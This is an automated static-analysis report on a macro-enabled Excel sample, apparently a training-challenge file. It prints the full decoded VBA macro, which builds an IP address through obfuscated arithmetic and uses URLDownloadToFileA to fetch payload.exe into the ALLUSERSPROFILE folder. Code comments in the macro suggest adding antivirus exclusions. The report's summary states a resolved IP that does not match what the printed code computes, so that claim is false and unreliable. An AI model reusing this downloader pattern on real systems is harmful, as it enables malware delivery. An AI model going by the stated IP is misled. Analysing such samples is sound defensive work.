Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3cba9c33fc278e1e…

MALICIOUS

Office (OOXML)

158.3 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-09-15
MD5: 56d5800018d83c60050162bebe6654ce SHA-1: a6ba6faa5c36483ad30743d18d7bdd33d1a56968 SHA-256: 3cba9c33fc278e1e1b1d8e433da4f90375e42fa2e0fc64cdde35e0787d3af7f9
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The VBA macro contains a call to URLDownloadToFileA, which is used to download a file from a constructed URL. The URL is assembled from calculated values and resolves to http://197.18.50.27/live-challenge/payload.exe. The macro also attempts to save the downloaded file as payload.exe in the ALLUSERSPROFILE directory, indicating an intent to download and execute a second-stage payload.

Heuristics 3

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3516 bytes
SHA-256: ea0632bca98e61da4e947944ac9821d6d3bebfabc9810b5a827e152b3396f600
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Button1_Click()

    'This is the first part of our challenge
    'Your first task is to discover the IP Address of a server from which the
    'following macro downloads payload.exe file
    'You will also need to get payload.exe file to complete further tasks
    'You might need to create some AV exclusions if this macro or payload.exe is detected as malicious

    Dim nm58937nnncbNMMr44 As STARTUPINFO
    Dim bnwer84903mndwoppeeeer As PROCESS_INFORMATION
    nm58937nnncbNMMr44.cb = Len(nm58937nnncbNMMr44)

    Dim orwpRRemsn23235 As String
    Dim orwpAAemsn23235 As Double
    Dim orwpBBemsn23235 As Double
    Dim orwpCCemsn23235 As Double
    Dim orwpDDemsn23235 As Double
    Dim orwpEEemsn23235 As String
    
    orwpRRemsn23235 = Environ("ALLUSERSPROFILE")
    
    orwpAAemsn23235 = 197
    orwpBBemsn23235 = Sqr(3249)
    orwpCCemsn23235 = 50 + 2
    orwpDDemsn23235 = Sqr(3969)
    
    orwpEEemsn23235 = orwpCCemsn23235 & "." & orwpBBemsn23235 & "." & orwpDDemsn23235 & "." & orwpAAemsn23235
    
    Ret = URLDownloadToFileA(0, "http://" & orwpEEemsn23235 & "/live-challenge/payload.exe", orwpRRemsn23235 & "\payload.exe", 0, 0)
       
End Sub



Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"
Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal handle As Long) As Long

Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
    (ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
    
Declare PtrSafe Function CreateProcessA Lib "kernel32" _
    (ByVal lpApplicationName As String, _
    ByVal lpCommandLine As String, _
    lpProcessAttributes As Any, _
    lpThreadAttributes As Any, _
    ByVal bInheritHandles As Long, _
    ByVal dwCreationFlags As Long, _
    lpEnvironment As Any, _
    ByVal lpCurrentDriectory As String, _
    lpStartupInfo As STARTUPINFO, _
    lpProcessInformation As PROCESS_INFORMATION) As Long


Public Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Public Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 26112 bytes
SHA-256: 563e345396078a6e2cbf918dae3afccac49ee9c36b47475728b67da7e322bb66

Open this report in the interactive analyzer, or submit your own file for analysis.